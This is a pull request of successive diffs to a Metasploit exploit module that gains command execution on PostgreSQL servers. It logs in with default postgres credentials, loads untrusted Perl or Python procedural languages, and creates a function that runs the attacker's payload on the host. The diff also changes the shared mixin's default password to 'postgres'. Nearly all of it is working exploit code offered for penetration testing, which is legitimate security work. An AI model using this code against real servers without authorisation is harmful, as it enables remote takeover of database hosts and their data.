### PR TITLE
Add Postgres createlang - Code execution with dynamic languages

### DIFF
--- a/lib/msf/core/exploit/postgres.rb
+++ b/lib/msf/core/exploit/postgres.rb
@@ -32,7 +32,7 @@ module Exploit::Remote::Postgres
         Opt::RPORT(5432),
         OptString.new('DATABASE', [ true, 'The database to authenticate against', 'template1']),
         OptString.new('USERNAME', [ true, 'The username to authenticate as', 'postgres']),
-        OptString.new('PASSWORD', [ false, 'The password for the specified username. Leave blank for a random password.', '']),
+        OptString.new('PASSWORD', [ false, 'The password for the specified username. Leave blank for a random password.', 'postgres']),
         OptBool.new('VERBOSE', [false, 'Enable verbose output', false]),
         OptString.new('SQL', [ false, 'The SQL query to execute',  'select version()']),
         OptBool.new('RETURN_ROWSET', [false, "Set to true to see query result sets", true])

--- a/modules/exploits/multi/postgres/postgres_createlang.rb
+++ b/modules/exploits/multi/postgres/postgres_createlang.rb
@@ -13,225 +13,196 @@ class Metasploit4 < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Tcp
   include Msf::Auxiliary::Report
 
-  # Creates an instance of this module.
   def initialize(info = {})
     super(update_info(info,
-            'Name' => 'PostgreSQL CREATE LANGUAGE Execution',
-            'Description' => %q(
-            Some installations of Postgres 8 and 9 are configured to allow loading external scripting languages.
-            Most commonly this is Perl and Python. When enabled, command execution is possible on the host.
-            To execute system commands, loading the "untrusted" version of the language is necessary.
-            This requires a superuser. This is usually postgres. The execution should be platform-agnostic,
-            and has been tested on OS X, Windows, and Linux.
+      'Name' => 'PostgreSQL CREATE LANGUAGE Execution',
+      'Description' => %q(
+        Some installations of Postgres 8 and 9 are configured to allow loading external scripting languages.
+        Most commonly this is Perl and Python. When enabled, command execution is possible on the host.
+        To execute system commands, loading the "untrusted" version of the language is necessary.
+        This requires a superuser. This is usually postgres. The execution should be platform-agnostic,
+        and has been tested on OS X, Windows, and Linux.
 
-            This module attempts to load Perl or Python to execute system commands. As this dynamically loads
-            a scripting language to execute commands, it is not necessary to drop a file on the filesystem.
+        This module attempts to load Perl or Python to execute system commands. As this dynamically loads
+        a scripting language to execute commands, it is not necessary to drop a file on the filesystem.
 
-            Only Postgres 8 and up are supported.
-          ),
-          'Author' => [
-            'Micheal Cottingham', # author of this module
-            'midnitesnake', # the postgres_payload module that this is based on
-          ],
-          'License' => MSF_LICENSE,
-          'References' => [
-            ['URL', 'http://www.postgresql.org/docs/current/static/sql-createlanguage.html'],
-            ['URL', 'http://www.postgresql.org/docs/current/static/plperl.html'],
-            ['URL', 'http://www.postgresql.org/docs/current/static/plpython.html']
-          ],
-          'Platform' => %w(linux unix win osx),
-          'Payload' => {
-            'PayloadType' => %w(cmd)
-          },
-          'Arch' => [ARCH_CMD],
-          'Targets' => [
-            ['Automatic', {}]
-          ],
-          'DefaultTarget' => 0,
-          'DisclosureDate' => 'Jan 1 2016')
-    )
+        Only Postgres 8 and up are supported.
+      ),
+      'Author' => [
+        'Micheal Cottingham', # author of this module
+        'midnitesnake', # the postgres_payload module that this is based on,
+        'Nixawk' # Improves the module
+      ],
+      'License' => MSF_LICENSE,
+      'References' => [
+        ['URL', 'http://www.postgresql.org/docs/current/static/sql-createlanguage.html'],
+        ['URL', 'http://www.postgresql.org/docs/current/static/plperl.html'],
+        ['URL', 'http://www.postgresql.org/docs/current/static/plpython.html']
+      ],
+      'Platform' => %w(linux unix win osx),
+      'Payload' => {
+        'PayloadType' => %w(cmd)
+      },
+      'Arch' => [ARCH_CMD],
+      'Targets' => [
+        ['Automatic', {}]
+      ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Jan 1 2016'))
 
     deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
   end
 
+  def postgres_major_version(version)
+    version_match = version.match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/)
+    version_match['major_version']
+  end
+
   def check
-    version = postgres_fingerprint
-
-    if version[:auth]
-      version_match = version[:auth].match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/)
-      major_version = version_match['major_version']
-
-      if major_version.to_i >= 8
-        return CheckCode::Appears
-
-      else
-        print_error "#{peer} - Unsupported version - #{version[:auth]}"
-        return CheckCode::Safe
-      end
-
+    if vuln_version?
+      Exploit::CheckCode::Appears
     else
-      print_error "#{peer} - Authentication failed"
-      return CheckCode::Unknown
+      Exploit::CheckCode::Safe
     end
   end
 
-  def exploit
-    version = do_login(username, password, database)
-
-    case version
-      when :noauth
-        print_error "#{peer} - Authentication failed"
-        return
-      when :noconn
-        print_error "#{peer} - Connection failed"
-        return
-      else
-        print_status "#{peer} - #{version}"
+  def vuln_version?
+    version = postgres_fingerprint
+    if version[:auth]
+      major_version = postgres_major_version(version[:auth])
+      return true if major_version.to_i >= 8
     end
+    false
+  end
 
-    version_match = version.match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/)
-    major_version = version_match['major_version']
-    extension = 'LANGUAGE'
-
-    if major_version.to_i == 8
-      print_status "#{peer} - Selecting version 8 attack"
-      extension = 'LANGUAGE'
-    elsif major_version.to_i >= 9
-      print_status "#{peer} - Selecting version 9 attack"
-      extension = 'EXTENSION'
+  def login_success?
+    status = do_login(username, password, database)
+    case status
+    when :noauth
+      print_error "#{peer} - Authentication failed"
+      return false
+    when :noconn
+      print_error "#{peer} - Connection failed"
+      return false
     else
-      print_error "#{peer} - Unsupported version - #{version}"
+      print_status "#{peer} - #{status}"
+      return true
+    end
+  end
+
+  def load_extension?(language)
+    case load_procedural_language(language, 'LANGUAGE')
+    when :exists
+      print_good "#{peer} - #{language} is already loaded, continuing"
+      return true
+    when :loaded
+      print_good "#{peer} - #{language} was successfully loaded, continuing"
+      return true
+    when :not_exists
+      print_status "#{peer} - #{language} could not be loaded"
+      return false
+    else
+      print_error "#{peer} - error occurred loading #{language}"
       return false
     end
-
-    print_warning 'This exploit does not clean up after itself - you will need to do that manually'
-
-    # Attack!
-    begin
-      func_name = Rex::Text.rand_text_alpha(10)
-
-      languages = %w(perl python python2 python3)
-      loaded = false
-
-      languages.each do |language|
-        load_lang = create_language(language, extension)
-        human_language = language.capitalize
-
-        print_status "#{peer} - Attempting to load #{human_language}"
-
-        case load_lang
-          when :exists
-            print_good "#{peer} - #{human_language} is already loaded, continuing"
-            create_function(language, func_name)
-            loaded = true
-          when :loaded
-            print_good "#{peer} - #{human_language} was successfully loaded, continuing"
-            create_function(language, func_name)
-            loaded = true
-          when :not_exists
-            print_status "#{peer} - #{human_language} could not be loaded"
-          else
-            print_error "#{peer} - error occurred loading #{human_language}"
-        end
-
-        break if loaded
-      end
-
-      if loaded
-        # Known bug: When using the cmd/unix/python*, ruby*, or bash payloads, it'll say
-        # "NoMethodError undefined method `+' for nil:NilClass"
-        # But the exploit and payload work just fine. I'm open to suggestions on why and how to fix - @micheal
-        select_query = postgres_query("SELECT exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')")
-
-        case select_query.keys[0]
-          when :conn_error
-            print_error "#{peer} - Connection error"
-          when :sql_error
-            print_error "#{peer} - Exploit failed"
-            return false
-          when :complete
-            print_good "#{peer} - Exploit successful"
-        end
-
-      else
-        print_error "#{peer} - Exploit failed -- unable to load any languages"
-        return false
-      end
-    end
-
-    postgres_logout if @postgres_conn
   end
 
-  def create_function(language, func_name)
+  def exec_function?(func_name)
+    query = "SELECT exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')"
+    select_query = postgres_query(query)
+
+    case select_query.keys[0]
+    when :conn_error
+      print_error "#{peer} - Connection error"
+      return false
+    when :sql_error
+      print_error "#{peer} - Exploit failed"
+      return false
+    when :complete
+      print_good "#{peer} - Exploit successful"
+      return true
+    else
+      print_error "#{peer} - Unknown"
+      return false
+    end
+  end
+
+  def create_function?(language, func_name)
     load_func = ''
 
     case language
-      when 'perl'
-        load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(text) RETURNS void as $$" \
-      "`$_[0]`;" \
-      "$$ LANGUAGE pl#{language}u")
-      when /^python(?:2|3)?/i
-        load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" \
-      "import subprocess, shlex\r" \
-      "subprocess.check_output(shlex.split(c))\r" \
-      "$$ LANGUAGE pl#{language}u")
+    when 'perl'
+      query = "CREATE OR REPLACE FUNCTION exec_#{func_name}(text) RETURNS void as $$"
+      query << "`$_[0]`;"
+      query << "$$ LANGUAGE pl#{language}u"
+      load_func = postgres_query(query)
+    when /^python(?:2|3)?/i
+      query = "CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r"
+      query << "import subprocess, shlex\rsubprocess.check_output(shlex.split(c))\r"
+      query << "$$ LANGUAGE pl#{language}u"
+      load_func = postgres_query(query)
     end
 
     case load_func.keys[0]
-      when :conn_error
-        print_error "#{peer} - Connection error"
-      when :sql_error
-        print_error "#{peer} Exploit failed"
-        return false
-      when :complete
-        print_good "#{peer} - Loaded UDF (exec_#{func_name})"
-    end
-  end
-
-  def create_language(language, extension)
-    load_language = postgres_query("CREATE #{extension} pl#{language}u")
-
-    if load_language.keys[0] == :sql_error
-
-      match_exists = load_language[:sql_error].match(/(?:(extension|language) "pl#{language}u" already exists)/m)
-
-      if match_exists
-        return :exists
-      else
-        match_error = load_language[:sql_error].match(/(?:could not (?:open extension control|access) file|unsupported language)/m)
-
-        if match_error
-          return :not_exists
-        end
-      end
-
+    when :conn_error
+      print_error "#{peer} - Connection error"
+      return false
+    when :sql_error
+      print_error "#{peer} Exploit failed"
+      return false
+    when :complete
+      print_good "#{peer} - Loaded UDF (exec_#{func_name})"
+      return true
     else
-      return :loaded
+      print_error "#{peer} - Unknown"
+      return false
     end
   end
 
-  # Authenticate to the postgres server.
-  # Returns the version from #postgres_fingerprint
+  def load_procedural_language(language, extension)
+    query = "CREATE #{extension} pl#{language}u"
+    load_language = postgres_query(query)
+    return :loaded unless load_language.keys[0] == :sql_error
+
+    match_exists = load_language[:sql_error].match(/(?:(extension|language) "pl#{language}u" already exists)/m)
+    return :exists if match_exists
+
+    match_error = load_language[:sql_error].match(/(?:could not (?:open extension control|access) file|unsupported language)/m)
+    return :not_exists if match_error
+  end
+
   def do_login(user, pass, database)
     begin
       password = pass || postgres_password
-
       result = postgres_fingerprint(
         db: database,
         username: user,
         password: password
       )
 
-      if result[:auth]
-        return result[:auth]
-
-      else
-        print_status "#{peer} - Login failed"
-        return :noauth
-      end
+      return result[:auth] if result[:auth]
+      print_status "#{peer} - Login failed"
+      return :noauth
 
     rescue Rex::ConnectionError
       return :noconn
     end
+  end
+
+  def exploit
+    return unless vuln_version?
+    return unless login_success?
+
+    languages = %w(perl python python2 python3)
+    languages.each do |language|
+      next unless load_extension?(language)
+      func_name = Rex::Text.rand_text_alpha(10)
+      next unless create_function?(language, func_name)
+      if exec_function?(func_name)
+        print_warning "Please clear extension [#{language}]: function [#{func_name}] manually"
+        break
+      end
+    end
+    postgres_logout if @postgres_conn
   end
 end

--- a/modules/exploits/multi/postgres/postgres_createlang.rb
+++ b/modules/exploits/multi/postgres/postgres_createlang.rb
@@ -15,40 +15,40 @@ class Metasploit4 < Msf::Exploit::Remote
   # Creates an instance of this module.
   def initialize(info = {})
     super(update_info(info,
-      'Name' => 'PostgreSQL CREATE LANGUAGE Execution',
-      'Description' => %q(
-        Some installations of Postgres 8 and 9 are configured to allow loading external scripting languages.
-        Most commonly this is Perl and Python. When enabled, command execution is possible on the host.
-        To execute system commands, loading the "untrusted" version of the language is necessary.
-        This requires a superuser. This is usually postgres. The execution should be platform-agnostic,
-        and has been tested on OS X, Windows, and Linux.
+          'Name' => 'PostgreSQL CREATE LANGUAGE Execution',
+          'Description' => %q(
+            Some installations of Postgres 8 and 9 are configured to allow loading external scripting languages.
+            Most commonly this is Perl and Python. When enabled, command execution is possible on the host.
+            To execute system commands, loading the "untrusted" version of the language is necessary.
+            This requires a superuser. This is usually postgres. The execution should be platform-agnostic,
+            and has been tested on OS X, Windows, and Linux.
 
-        This module attempts to load Perl or Python to execute system commands. As this dynamically loads
-        a scripting language to execute commands, it is not necessary to drop a file on the filesystem.
+            This module attempts to load Perl or Python to execute system commands. As this dynamically loads
+            a scripting language to execute commands, it is not necessary to drop a file on the filesystem.
 
-        Only Postgres 8 and up are supported.
-      ),
-      'Author' => [
-        'Micheal Cottingham', # author of this module
-        'midnitesnake', # the postgres_payload module that this is based on
-      ],
-      'License' => MSF_LICENSE,
-      'References' => [
-        ['URL', 'http://www.postgresql.org/docs/current/static/sql-createlanguage.html'],
-        ['URL', 'http://www.postgresql.org/docs/current/static/plperl.html'],
-        ['URL', 'http://www.postgresql.org/docs/current/static/plpython.html']
-      ],
-      'Platform' => %w(linux unix win osx),
-      'Payload' => {
-        'PayloadType' => %w(cmd)
-      },
-      'Arch' => [ARCH_CMD],
-      'Targets' => [
-        ['Automatic', {}]
-      ],
-      'DefaultTarget' => 0,
-      'DisclosureDate' => 'Jan 1 2016')
-      )
+            Only Postgres 8 and up are supported.
+          ),
+          'Author' => [
+            'Micheal Cottingham', # author of this module
+            'midnitesnake', # the postgres_payload module that this is based on
+          ],
+          'License' => MSF_LICENSE,
+          'References' => [
+            ['URL', 'http://www.postgresql.org/docs/current/static/sql-createlanguage.html'],
+            ['URL', 'http://www.postgresql.org/docs/current/static/plperl.html'],
+            ['URL', 'http://www.postgresql.org/docs/current/static/plpython.html']
+          ],
+          'Platform' => %w(linux unix win osx),
+          'Payload' => {
+            'PayloadType' => %w(cmd)
+          },
+          'Arch' => [ARCH_CMD],
+          'Targets' => [
+            ['Automatic', {}]
+          ],
+          'DefaultTarget' => 0,
+          'DisclosureDate' => 'Jan 1 2016')
+        )
 
     register_options([
       OptString.new('USERNAME', [true, 'The username to the service', 'postgres']),
@@ -69,12 +69,12 @@ class Metasploit4 < Msf::Exploit::Remote
         return CheckCode::Appears
 
       else
-        print_error 'Unsupported version'
+        print_error "#{rhost}:#{rport} - Unsupported version - #{version[:auth]}"
         return CheckCode::Safe
       end
 
     else
-      print_error "Authentication failed. #{version[:preauth] || version[:unknown]}"
+      print_error "#{rhost}:#{rport} - Authentication failed"
       return CheckCode::Safe
     end
   end
@@ -83,16 +83,16 @@ class Metasploit4 < Msf::Exploit::Remote
     version = do_login(username, password, database)
 
     case version
-    when :noauth
-      print_error 'Authentication failed.'
-      return
+      when :noauth
+        print_error "#{rhost}:#{rport} - Authentication failed"
+        return
 
-    when :noconn
-      print_error 'Connection failed.'
-      return
+      when :noconn
+        print_error "#{rhost}:#{rport} - Connection failed"
+        return
 
-    else
-      print_status "#{rhost}:#{rport} - #{version}"
+      else
+        print_status "#{rhost}:#{rport} - #{version}"
     end
 
     version_match = version.match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/)
@@ -100,15 +100,15 @@ class Metasploit4 < Msf::Exploit::Remote
     extension = 'LANGUAGE'
 
     if major_version.to_i == 8
-      print_status 'Selecting version 8 payload'
+      print_status "#{rhost}:#{rport} - Selecting version 8 attack"
       extension = 'LANGUAGE'
 
     elsif major_version.to_i >= 9
-      print_status 'Selecting version 9 payload'
-      extension = 'EXTENSION'
+      print_status "#{rhost}:#{rport} - Selecting version 9 attack"
+      extension = 'LANGUAGE'
 
     else
-      print_error 'Unsupported version - exploit failed'
+      print_error "#{rhost}:#{rport} - Unsupported version - #{version}"
       return false
     end
 
@@ -123,27 +123,27 @@ class Metasploit4 < Msf::Exploit::Remote
 
       languages.each do |language|
         load_lang = create_language(language, extension)
-        human_language = language.capitalize.to_s
+        human_language = language.capitalize
 
-        print_status "Attempting to load #{human_language}"
+        print_status "#{rhost}:#{rport} - Attempting to load #{human_language}"
 
         case load_lang
-        when 'exists'
-          print_good "#{human_language} is already loaded, continuing"
-          create_function(language, func_name)
-          loaded = true
+          when :exists
+            print_good "#{rhost}:#{rport} - #{human_language} is already loaded, continuing"
+            create_function(language, func_name)
+            loaded = true
 
-        when 'loaded'
-          print_good "#{human_language} was successfully loaded, continuing"
-          create_function(language, func_name)
-          loaded = true
+          when :loaded
+            print_good "#{rhost}:#{rport} - #{human_language} was successfully loaded, continuing"
+            create_function(language, func_name)
+            loaded = true
 
-        when 'not_exists'
-          print_status "#{human_language} could not be loaded"
+          when :not_exists
+            print_status "#{rhost}:#{rport} - #{human_language} could not be loaded"
 
-        else
-          print_error 'No exploit path found'
-          return false
+          else
+            print_error "#{rhost}:#{rport} - Error occurred"
+            return false
         end
 
         break if loaded
@@ -156,23 +156,24 @@ class Metasploit4 < Msf::Exploit::Remote
         select_query = postgres_query("SELECT exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')")
 
         case select_query.keys[0]
-        when :conn_error
-          print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect."
+          when :conn_error
+            print_error "#{rhost}:#{rport} - Connection error"
 
-        when :sql_error
-          print_error "Exploit failed"
-          return false
+          when :sql_error
+            print_error "#{rhost}:#{rport} - Exploit failed"
+            return false
 
-        when :complete
-          print_good 'Starting payload'
+          when :complete
+            print_good "#{rhost}:#{rport} - Exploit successful"
         end
 
       else
+        print_error "#{rhost}:#{rport} - Exploit failed"
         return false
       end
 
     rescue RuntimeError => e
-      print_error "Failed to create UDF: #{e.class}: #{e}"
+      print_error "#{rhost}:#{rport} - Failed to create UDF: #{e.class}: #{e}"
     end
 
     postgres_logout if @postgres_conn
@@ -182,66 +183,51 @@ class Metasploit4 < Msf::Exploit::Remote
     load_func = ''
 
     case language
-    when 'perl'
-      load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(text) RETURNS void as $$" \
+      when 'perl'
+        load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(text) RETURNS void as $$" \
         "`$_[0]`;" \
         "$$ LANGUAGE pl#{language}u")
 
-    # Ruby doesn't do case folding ... :/
-    when 'python'
-      load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" \
+      when /^python(?:2|3)?/i
+        load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" \
         "import subprocess, shlex\r" \
         "subprocess.check_output(shlex.split(c))\r" \
         "$$ LANGUAGE pl#{language}u")
-
-    when 'python2'
-      load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" \
-        "import subprocess, shlex\r" \
-        "subprocess.check_output(shlex.split(c))\r" \
-        "$$ LANGUAGE pl#{language}u")
-
-    when 'python3'
-      load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" \
-        "import subprocess, shlex\r" \
-        "subprocess.check_output(shlex.split(c))\r" \
-        "$$ LANGUAGE pl#{language}u")
-
-    else
-      print_error 'Invalid language'
     end
 
     case load_func.keys[0]
-    when :conn_error
-      print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect."
+      when :conn_error
+        print_error "#{rhost}:#{rport} - Connection error"
 
-    when :sql_error
-      print_error "#{rhost}:#{rport} Exploit failed"
-      return false
+      when :sql_error
+        print_error "#{rhost}:#{rport} Exploit failed"
+        return false
 
-    when :complete
-      print_good 'Loaded UDF'
-    end
+      when :complete
+        print_good "#{rhost}:#{rport} - Loaded UDF (exec_#{func_name})"
+      end
   end
 
   def create_language(language, extension)
     load_language = postgres_query("CREATE #{extension} pl#{language}u")
 
     if load_language.keys[0] == :sql_error
-      match_exists = load_language[:sql_error].match(/language "pl#{language}u" already exists/m)
+
+      match_exists = load_language[:sql_error].match(/(?:(extension|language) "pl#{language}u" already exists)/m)
 
       if match_exists
-        return 'exists'
+        return :exists
 
       else
-        match_error = load_language[:sql_error].match(/(could not (open extension control|access) file|unsupported language)/m)
+        match_error = load_language[:sql_error].match(/(?:could not (?:open extension control|access) file|unsupported language)/m)
 
         if match_error
-          return 'not_exists'
+          return :not_exists
         end
       end
 
     else
-      return 'loaded'
+      return :loaded
     end
   end
 
@@ -250,8 +236,6 @@ class Metasploit4 < Msf::Exploit::Remote
   def do_login(user, pass, database)
     begin
       password = pass || postgres_password
-
-      vprint_status("Trying #{user}:#{password}@#{rhost}:#{rport}/#{database}")
 
       result = postgres_fingerprint(
         db: database,
@@ -263,7 +247,7 @@ class Metasploit4 < Msf::Exploit::Remote
         return result[:auth]
 
       else
-        print_status("Login failed, fingerprint is #{result[:preauth] || result[:unknown]}")
+        print_status "#{rhost}:#{rport} - Login failed"
         return :noauth
       end
 

--- a/modules/exploits/multi/postgres/postgres_createlang.rb
+++ b/modules/exploits/multi/postgres/postgres_createlang.rb
@@ -233,7 +233,7 @@ class Metasploit4 < Msf::Exploit::Remote
         return 'exists'
 
       else
-        match_error = load_language[:sql_error].match(/(could not access file|unsupported language)/m)
+        match_error = load_language[:sql_error].match(/(could not (open extension control|access) file|unsupported language)/m)
 
         if match_error
           return 'not_exists'

--- a/modules/exploits/multi/postgres/postgres_createlang.rb
+++ b/modules/exploits/multi/postgres/postgres_createlang.rb
@@ -10,13 +10,14 @@ class Metasploit4 < Msf::Exploit::Remote
   Rank = GoodRanking
 
   include Msf::Exploit::Remote::Postgres
+  include Msf::Exploit::Remote::Tcp
   include Msf::Auxiliary::Report
 
   # Creates an instance of this module.
   def initialize(info = {})
     super(update_info(info,
-          'Name' => 'PostgreSQL CREATE LANGUAGE Execution',
-          'Description' => %q(
+            'Name' => 'PostgreSQL CREATE LANGUAGE Execution',
+            'Description' => %q(
             Some installations of Postgres 8 and 9 are configured to allow loading external scripting languages.
             Most commonly this is Perl and Python. When enabled, command execution is possible on the host.
             To execute system commands, loading the "untrusted" version of the language is necessary.
@@ -48,12 +49,7 @@ class Metasploit4 < Msf::Exploit::Remote
           ],
           'DefaultTarget' => 0,
           'DisclosureDate' => 'Jan 1 2016')
-        )
-
-    register_options([
-      OptString.new('USERNAME', [true, 'The username to the service', 'postgres']),
-      OptString.new('PASSWORD', [true, 'The password to the service', 'postgres'])
-    ])
+    )
 
     deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
   end
@@ -84,15 +80,13 @@ class Metasploit4 < Msf::Exploit::Remote
 
     case version
       when :noauth
-        print_error "#{rhost}:#{rport} - Authentication failed"
+        print_error "#{peer} - Authentication failed"
         return
-
       when :noconn
-        print_error "#{rhost}:#{rport} - Connection failed"
+        print_error "#{peer} - Connection failed"
         return
-
       else
-        print_status "#{rhost}:#{rport} - #{version}"
+        print_status "#{peer} - #{version}"
     end
 
     version_match = version.match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/)
@@ -100,15 +94,13 @@ class Metasploit4 < Msf::Exploit::Remote
     extension = 'LANGUAGE'
 
     if major_version.to_i == 8
-      print_status "#{rhost}:#{rport} - Selecting version 8 attack"
+      print_status "#{peer} - Selecting version 8 attack"
       extension = 'LANGUAGE'
-
     elsif major_version.to_i >= 9
-      print_status "#{rhost}:#{rport} - Selecting version 9 attack"
+      print_status "#{peer} - Selecting version 9 attack"
       extension = 'EXTENSION'
-
     else
-      print_error "#{rhost}:#{rport} - Unsupported version - #{version}"
+      print_error "#{peer} - Unsupported version - #{version}"
       return false
     end
 
@@ -125,25 +117,21 @@ class Metasploit4 < Msf::Exploit::Remote
         load_lang = create_language(language, extension)
         human_language = language.capitalize
 
-        print_status "#{rhost}:#{rport} - Attempting to load #{human_language}"
+        print_status "#{peer} - Attempting to load #{human_language}"
 
         case load_lang
           when :exists
-            print_good "#{rhost}:#{rport} - language is already loaded, continuing"
+            print_good "#{peer} - #{human_language} is already loaded, continuing"
             create_function(language, func_name)
             loaded = true
-
           when :loaded
-            print_good "#{rhost}:#{rport} - language was successfully loaded, continuing"
+            print_good "#{peer} - #{human_language} was successfully loaded, continuing"
             create_function(language, func_name)
             loaded = true
-
           when :not_exists
-            print_status "#{rhost}:#{rport} - language could not be loaded"
-
+            print_status "#{peer} - #{human_language} could not be loaded"
           else
-            print_error "#{rhost}:#{rport} - Error occurred"
-            return false
+            print_error "#{peer} - error occurred loading #{human_language}"
         end
 
         break if loaded
@@ -157,18 +145,16 @@ class Metasploit4 < Msf::Exploit::Remote
 
         case select_query.keys[0]
           when :conn_error
-            print_error "#{rhost}:#{rport} - Connection error"
-
+            print_error "#{peer} - Connection error"
           when :sql_error
-            print_error "#{rhost}:#{rport} - Exploit failed"
+            print_error "#{peer} - Exploit failed"
             return false
-
           when :complete
-            print_good "#{rhost}:#{rport} - Exploit successful"
+            print_good "#{peer} - Exploit successful"
         end
 
       else
-        print_error "#{rhost}:#{rport} - Exploit failed"
+        print_error "#{peer} - Exploit failed -- unable to load any languages"
         return false
       end
     end
@@ -182,27 +168,24 @@ class Metasploit4 < Msf::Exploit::Remote
     case language
       when 'perl'
         load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(text) RETURNS void as $$" \
-        "`$_[0]`;" \
-        "$$ LANGUAGE pl#{language}u")
-
+      "`$_[0]`;" \
+      "$$ LANGUAGE pl#{language}u")
       when /^python(?:2|3)?/i
         load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" \
-        "import subprocess, shlex\r" \
-        "subprocess.check_output(shlex.split(c))\r" \
-        "$$ LANGUAGE pl#{language}u")
+      "import subprocess, shlex\r" \
+      "subprocess.check_output(shlex.split(c))\r" \
+      "$$ LANGUAGE pl#{language}u")
     end
 
     case load_func.keys[0]
       when :conn_error
-        print_error "#{rhost}:#{rport} - Connection error"
-
+        print_error "#{peer} - Connection error"
       when :sql_error
-        print_error "#{rhost}:#{rport} Exploit failed"
+        print_error "#{peer} Exploit failed"
         return false
-
       when :complete
-        print_good "#{rhost}:#{rport} - Loaded UDF (exec_#{func_name})"
-      end
+        print_good "#{peer} - Loaded UDF (exec_#{func_name})"
+    end
   end
 
   def create_language(language, extension)
@@ -214,7 +197,6 @@ class Metasploit4 < Msf::Exploit::Remote
 
       if match_exists
         return :exists
-
       else
         match_error = load_language[:sql_error].match(/(?:could not (?:open extension control|access) file|unsupported language)/m)
 
@@ -244,7 +226,7 @@ class Metasploit4 < Msf::Exploit::Remote
         return result[:auth]
 
       else
-        print_status "#{rhost}:#{rport} - Login failed"
+        print_status "#{peer} - Login failed"
         return :noauth
       end
 

--- a/modules/exploits/multi/postgres/postgres_createlang.rb
+++ b/modules/exploits/multi/postgres/postgres_createlang.rb
@@ -53,7 +53,7 @@ class Metasploit4 < Msf::Exploit::Remote
     register_options([
       OptString.new('USERNAME', [true, 'The username to the service', 'postgres']),
       OptString.new('PASSWORD', [true, 'The password to the service', 'postgres'])
-    ], self.class)
+    ])
 
     deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
   end
@@ -69,13 +69,13 @@ class Metasploit4 < Msf::Exploit::Remote
         return CheckCode::Appears
 
       else
-        print_error "#{rhost}:#{rport} - Unsupported version - #{version[:auth]}"
+        print_error "#{peer} - Unsupported version - #{version[:auth]}"
         return CheckCode::Safe
       end
 
     else
-      print_error "#{rhost}:#{rport} - Authentication failed"
-      return CheckCode::Safe
+      print_error "#{peer} - Authentication failed"
+      return CheckCode::Unknown
     end
   end
 
@@ -105,7 +105,7 @@ class Metasploit4 < Msf::Exploit::Remote
 
     elsif major_version.to_i >= 9
       print_status "#{rhost}:#{rport} - Selecting version 9 attack"
-      extension = 'LANGUAGE'
+      extension = 'EXTENSION'
 
     else
       print_error "#{rhost}:#{rport} - Unsupported version - #{version}"
@@ -129,17 +129,17 @@ class Metasploit4 < Msf::Exploit::Remote
 
         case load_lang
           when :exists
-            print_good "#{rhost}:#{rport} - #{human_language} is already loaded, continuing"
+            print_good "#{rhost}:#{rport} - language is already loaded, continuing"
             create_function(language, func_name)
             loaded = true
 
           when :loaded
-            print_good "#{rhost}:#{rport} - #{human_language} was successfully loaded, continuing"
+            print_good "#{rhost}:#{rport} - language was successfully loaded, continuing"
             create_function(language, func_name)
             loaded = true
 
           when :not_exists
-            print_status "#{rhost}:#{rport} - #{human_language} could not be loaded"
+            print_status "#{rhost}:#{rport} - language could not be loaded"
 
           else
             print_error "#{rhost}:#{rport} - Error occurred"
@@ -171,9 +171,6 @@ class Metasploit4 < Msf::Exploit::Remote
         print_error "#{rhost}:#{rport} - Exploit failed"
         return false
       end
-
-    rescue RuntimeError => e
-      print_error "#{rhost}:#{rport} - Failed to create UDF: #{e.class}: #{e}"
     end
 
     postgres_logout if @postgres_conn
@@ -251,7 +248,7 @@ class Metasploit4 < Msf::Exploit::Remote
         return :noauth
       end
 
-    rescue Rex::ConnectionError, Rex::Post::Meterpreter::RequestError
+    rescue Rex::ConnectionError
       return :noconn
     end
   end

--- a/modules/exploits/multi/postgres/postgres_createlang.rb
+++ b/modules/exploits/multi/postgres/postgres_createlang.rb
@@ -70,7 +70,7 @@ class Metasploit4 < Msf::Exploit::Remote
     version = postgres_fingerprint
     if version[:auth]
       major_version = postgres_major_version(version[:auth])
-      return true if major_version.to_i >= 8
+      return true if major_version && major_version.to_i >= 8
     end
     false
   end

--- a/modules/exploits/multi/postgres/postgres_createlang.rb
+++ b/modules/exploits/multi/postgres/postgres_createlang.rb
@@ -17,7 +17,7 @@ class Metasploit4 < Msf::Exploit::Remote
 		super(update_info(info,
 			'Name' => 'PostgreSQL CREATE LANGUAGE Execution',
 			'Description' => %q{
-				Some installations of Postgres are configured to allow loading external  scripting languages.
+				Some installations of Postgres 8 and 9 are configured to allow loading external  scripting languages.
 				Most commonly this is Perl and  Python. When enabled, command execution is possible  on the host.
